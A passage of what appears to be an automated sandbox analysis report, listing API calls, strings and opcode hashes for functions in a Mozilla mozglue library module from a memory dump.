                                                                  • EnterCriticalSection.KERNEL32(6C94F688), ref: 6C8E5D67
                                                                  • __aulldiv.LIBCMT ref: 6C8E5DB4
                                                                  • LeaveCriticalSection.KERNEL32(6C94F688), ref: 6C8E5DED
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                  • String ID:
                                                                  • API String ID: 557828605-0
                                                                  • Opcode ID: 5fec0779fe26884a7cc2e7ec1366897c961d354944026a30bebb37dab2e2ac36
                                                                  • Instruction ID: fa38b2826a2dbd0bac6c237c7daf9a07a8f4c359c68a1f603e63bdf6f756e800
                                                                  • Opcode Fuzzy Hash: 5fec0779fe26884a7cc2e7ec1366897c961d354944026a30bebb37dab2e2ac36
                                                                  • Instruction Fuzzy Hash: 51517371F0425A8FCF18DF68C954AAEB7B1FB8A308F298A29C815A7750C7306945CB90
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8CCEBD
                                                                  • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C8CCEF5
                                                                  • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C8CCF4E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$memset
                                                                  • String ID: 0
                                                                  • API String ID: 438689982-4108050209
                                                                  • Opcode ID: 2d730ab26dfb7fc68f4774d63a23b879ac49224b205cd3ea49cb40413fab254b
                                                                  • Instruction ID: 9a90fc2f82d05c7f6a70cf2764b0e2fb975ea73d36296a0baa49802498f6b414
                                                                  • Opcode Fuzzy Hash: 2d730ab26dfb7fc68f4774d63a23b879ac49224b205cd3ea49cb40413fab254b
                                                                  • Instruction Fuzzy Hash: F4512471A0022A8FCB10CF18C490AAAFBB5EF99304F19869DD8595F752D371ED06CBE0
                                                                  APIs
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9277FA
                                                                  • ?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6C927829
                                                                    • Part of subcall function 6C8FCC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C8C31A7), ref: 6C8FCC45
                                                                    • Part of subcall function 6C8FCC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C8C31A7), ref: 6C8FCC4E
                                                                  • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C92789F
                                                                  • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C9278CF
                                                                    • Part of subcall function 6C8C4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C8C4E5A
                                                                    • Part of subcall function 6C8C4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C8C4E97
                                                                    • Part of subcall function 6C8C4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C903EBD,6C903EBD,00000000), ref: 6C8C42A9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
                                                                  • String ID:
                                                                  • API String ID: 2525797420-0
                                                                  • Opcode ID: ecb69420fdffecad519c40e932a8627e4ffc6fd23a4c05469012db82bfee031c
                                                                  • Instruction ID: de49c6c4745c8d7f255efb3082d44918ffd3b7b006a020179a90dd057b063dd0
                                                                  • Opcode Fuzzy Hash: ecb69420fdffecad519c40e932a8627e4ffc6fd23a4c05469012db82bfee031c
                                                                  • Instruction Fuzzy Hash: C241AF719087069BD310DF29C48056BFBF4FFCA258F204A6EE4A987640DB70D559CB92
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C9082BC,?,?), ref: 6C90649B
                                                                    • Part of subcall function 6C8DCA10: malloc.MOZGLUE(?), ref: 6C8DCA26
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9064A9
                                                                    • Part of subcall function 6C8FFA80: GetCurrentThreadId.KERNEL32 ref: 6C8FFA8D
                                                                    • Part of subcall function 6C8FFA80: AcquireSRWLockExclusive.KERNEL32(6C94F448), ref: 6C8FFA99
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C90653F
                                                                  • free.MOZGLUE(?), ref: 6C90655A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                  • String ID:
                                                                  • API String ID: 3596744550-0
                                                                  • Opcode ID: 9c4d9777e8be3232828dcd160b87291884548d769db6210a99ca394ef2412f74
                                                                  • Instruction ID: 26d4d1b69ad00466f7323fac1675765fcb8074e51844566af6a2e94afdde6c80
                                                                  • Opcode Fuzzy Hash: 9c4d9777e8be3232828dcd160b87291884548d769db6210a99ca394ef2412f74
                                                                  • Instruction Fuzzy Hash: 143181B5A087159FD700DF24D884A9BBBE4BF99318F50482DE85A87741E730E919CB92
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6C91D019,?,?,?,?,?,00000000,?,6C90DA31,00100000,?), ref: 6C8FFFD3
                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,6C91D019,?,?,?,?,?,00000000,?,6C90DA31,00100000,?,?), ref: 6C8FFFF5
                                                                  • free.MOZGLUE(?,?,?,?,?,6C91D019,?,?,?,?,?,00000000,?,6C90DA31,00100000,?), ref: 6C90001B
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6C91D019,?,?,?,?,?,00000000,?,6C90DA31,00100000,?,?), ref: 6C90002A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
                                                                  • String ID:
                                                                  • API String ID: 826125452-0
                                                                  • Opcode ID: 84ba38335f494244eef991e26fea5a816e1949fc7a6c80610c6e916f45dbbe8f
                                                                  • Instruction ID: dde9739dfbbc106c272441b33055ff787d3ccbfd0b5a0e1fca6baa2d3f319a0c
                                                                  • Opcode Fuzzy Hash: 84ba38335f494244eef991e26fea5a816e1949fc7a6c80610c6e916f45dbbe8f
                                                                  • Instruction Fuzzy Hash: B721D6B2B002165BD7189E7C9CD48AFB7FAEB953247250738E425D7780EB70AD02C6D1
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C8DB4F5
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C8DB502
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C8DB542
                                                                  • free.MOZGLUE(?), ref: 6C8DB578
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                  • String ID:
                                                                  • API String ID: 2047719359-0
                                                                  • Opcode ID: 483432563e57a7ee83be588eed96bdb2c7fbe5fbfae3f242fa3fac568ccafc45
                                                                  • Instruction ID: 43511ca6a4840978ad79889be44d9c124cec34bdb7b6c33345f0fbef8acdc5f6
                                                                  • Opcode Fuzzy Hash: 483432563e57a7ee83be588eed96bdb2c7fbe5fbfae3f242fa3fac568ccafc45
                                                                  • Instruction Fuzzy Hash: 0011C031A28B46C7D7219F29C504766B3B1FFD632CF219B1AD84952A01EBB0B1C48790
                                                                  APIs
                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C8CF20E,?), ref: 6C903DF5
                                                                  • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C8CF20E,00000000,?), ref: 6C903DFC
                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C903E06
                                                                  • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C903E0E
                                                                    • Part of subcall function 6C8FCC00: GetCurrentProcess.KERNEL32(?,?,6C8C31A7), ref: 6C8FCC0D
                                                                    • Part of subcall function 6C8FCC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C8C31A7), ref: 6C8FCC16
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                  • String ID:
                                                                  • API String ID: 2787204188-0
                                                                  • Opcode ID: affac322128b3b1ea45cc9f6b649cf76f87d87965d707d7fb37fe6be44310e4e
                                                                  • Instruction ID: 1f842813dce9fc6e7a67c22524fcce855907a8c4f8b5eb9ff9a6a45911b8adb6
                                                                  • Opcode Fuzzy Hash: affac322128b3b1ea45cc9f6b649cf76f87d87965d707d7fb37fe6be44310e4e
                                                                  • Instruction Fuzzy Hash: 23F058B1A002086BEB00AB54EC81DAB372CEB56628F154020FE0857701D635FA2986F6
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9120B7
                                                                  • AcquireSRWLockExclusive.KERNEL32(00000000,?,6C8FFBD1), ref: 6C9120C0
                                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000,?,6C8FFBD1), ref: 6C9120DA
                                                                  • free.MOZGLUE(00000000,?,6C8FFBD1), ref: 6C9120F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                  • String ID:
                                                                  • API String ID: 2047719359-0
                                                                  • Opcode ID: 27737a148d0d294cae2093802c877a925cc65c3a0fc63077f8cdc977a4ed63e5
                                                                  • Instruction ID: 8e4b1a7dca1a442002c1bb6643343e872b32e845ecfd70f71e1e506ae02c81ec
                                                                  • Opcode Fuzzy Hash: 27737a148d0d294cae2093802c877a925cc65c3a0fc63077f8cdc977a4ed63e5
                                                                  • Instruction Fuzzy Hash: D4E0E531608E188BC320AF25980994FB7F9EF87318B10062AE50A83F00E776E54686D5
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C9185D3
                                                                    • Part of subcall function 6C8DCA10: malloc.MOZGLUE(?), ref: 6C8DCA26
                                                                  • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C918725
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                  • String ID: map/set<T> too long
                                                                  • API String ID: 3720097785-1285458680
                                                                  • Opcode ID: cc73a5fb4722cc610591db91198878b771d4392eb33e517d148743e6e2302417
                                                                  • Instruction ID: db0e6d7c278a90cf516cd2290161bc6ebd3d4888715daf8d4e966625ea4bdadc
                                                                  • Opcode Fuzzy Hash: cc73a5fb4722cc610591db91198878b771d4392eb33e517d148743e6e2302417
                                                                  • Instruction Fuzzy Hash: 9C5197B4A08649CFC705CF18C084B56BBF1BF5A318F1AC28AD8584BB52C334E845CF95
                                                                  APIs
                                                                  • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C8CBDEB
                                                                  • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C8CBE8F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                  • String ID: 0
                                                                  • API String ID: 2811501404-4108050209
                                                                  • Opcode ID: 13db2796fd60976160b498fb58cd8b79b7c61df22ff867ec05d36de1994ee443
                                                                  • Instruction ID: ee4a4d6943e9e3b0abd51d7e3b87fa0d592e824386b621d0b6324986a7d12780
                                                                  • Opcode Fuzzy Hash: 13db2796fd60976160b498fb58cd8b79b7c61df22ff867ec05d36de1994ee443
                                                                  • Instruction Fuzzy Hash: 8C41A271A09B49CFC721CF38C58196BB7E4AF8A348F008E1DF99557611D731D9498B93
                                                                  APIs
                                                                  • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C903D19
                                                                  • mozalloc_abort.MOZGLUE(?), ref: 6C903D6C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: _errnomozalloc_abort
                                                                  • String ID: d
                                                                  • API String ID: 3471241338-2564639436
                                                                  • Opcode ID: 24f1904f4db4c81c0ef6779ef423226e7a56a7670c43867d4475681075b0388d
                                                                  • Instruction ID: b05de8288cc03782161445cc151b3e97a098d4e314aa82d65009efa017ada6f4
                                                                  • Opcode Fuzzy Hash: 24f1904f4db4c81c0ef6779ef423226e7a56a7670c43867d4475681075b0388d
                                                                  • Instruction Fuzzy Hash: E311BF36F08688DBDB009B69C8148ADB779FF96618B45922DDC499B602FB30E984C390
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C8D44B2,6C94E21C,6C94F7F8), ref: 6C8D473E
                                                                  • GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C8D474A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: GetNtLoaderAPI
                                                                  • API String ID: 1646373207-1628273567
                                                                  • Opcode ID: 49a543e6567c942a46a5e8c02c5cacef8fe6c40f49e3f9cdb2d823eb02738633
                                                                  • Instruction ID: 1a9ba727ea4b2b26d45a4c883be6b322734d0906f3a11a856baeaf9d42ff767b
                                                                  • Opcode Fuzzy Hash: 49a543e6567c942a46a5e8c02c5cacef8fe6c40f49e3f9cdb2d823eb02738633
                                                                  • Instruction Fuzzy Hash: 960192757087588FDF00AF758854A1E7BB9EBCB319B158469E905CB300DB74E801CF91
                                                                  APIs
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C926E22
                                                                  • __Init_thread_footer.LIBCMT ref: 6C926E3F
                                                                  Strings
                                                                  • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C926E1D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Init_thread_footergetenv
                                                                  • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                  • API String ID: 1472356752-1153589363
                                                                  • Opcode ID: 803e71e18fd8661e9780b9a8662cd2bfde66cc80f71d15fc5536f432c6e7baac
                                                                  • Instruction ID: 91e427e641ac0024c347f2dea973fbfa816e27a168085c76399c0abf204917bb
                                                                  • Opcode Fuzzy Hash: 803e71e18fd8661e9780b9a8662cd2bfde66cc80f71d15fc5536f432c6e7baac
                                                                  • Instruction Fuzzy Hash: 53F0593520928ECBDB10ABA8C950A927372935331CF248165C89446F51D724E52FCB93
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 6C8D9EEF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Init_thread_footer
                                                                  • String ID: Infinity$NaN
                                                                  • API String ID: 1385522511-4285296124
                                                                  • Opcode ID: f8025714a092a578585f7275bb905f34585b2da987be2b5136b55d37f088ae08
                                                                  • Instruction ID: e64710d1858863cbfb38ff6ffaf2b9b77ab9fa7f6c2e8379fc67c35cf932a143
                                                                  • Opcode Fuzzy Hash: f8025714a092a578585f7275bb905f34585b2da987be2b5136b55d37f088ae08
                                                                  • Instruction Fuzzy Hash: F3F0A971608343CADB20EF98EA55B823371A34331DF308A68C5080AB40D775A54ACB82
                                                                  APIs
                                                                  • DisableThreadLibraryCalls.KERNEL32(?), ref: 6C8DBEE3
                                                                  • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C8DBEF5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Library$CallsDisableLoadThread
                                                                  • String ID: cryptbase.dll
                                                                  • API String ID: 4137859361-1262567842
                                                                  • Opcode ID: 9d236922cd49c4db164ea564f9d7447b1997b911cf8619c2e7317651a257da9a
                                                                  • Instruction ID: 13d29c66dd0c0eb35a02a4a10271a528b0add53785d43f8eb175bb49b239ee5f
                                                                  • Opcode Fuzzy Hash: 9d236922cd49c4db164ea564f9d7447b1997b911cf8619c2e7317651a257da9a
                                                                  • Instruction Fuzzy Hash: 58D0C932288608EADB54BAA48E0AF2E3BB8A742729F20C425F75595951C7B1A461CF94
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C8C4E9C,?,?,?,?,?), ref: 6C8C510A
                                                                  • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C8C4E9C,?,?,?,?,?), ref: 6C8C5167
                                                                  • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6C8C5196
                                                                  • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C8C4E9C), ref: 6C8C5234
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID:
                                                                  • API String ID: 3510742995-0
                                                                  • Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                  • Instruction ID: 2f1b6bc8cc2b4db637216634a82d215e2dfbbe7e405b0837d7b34ded0f208cef
                                                                  • Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
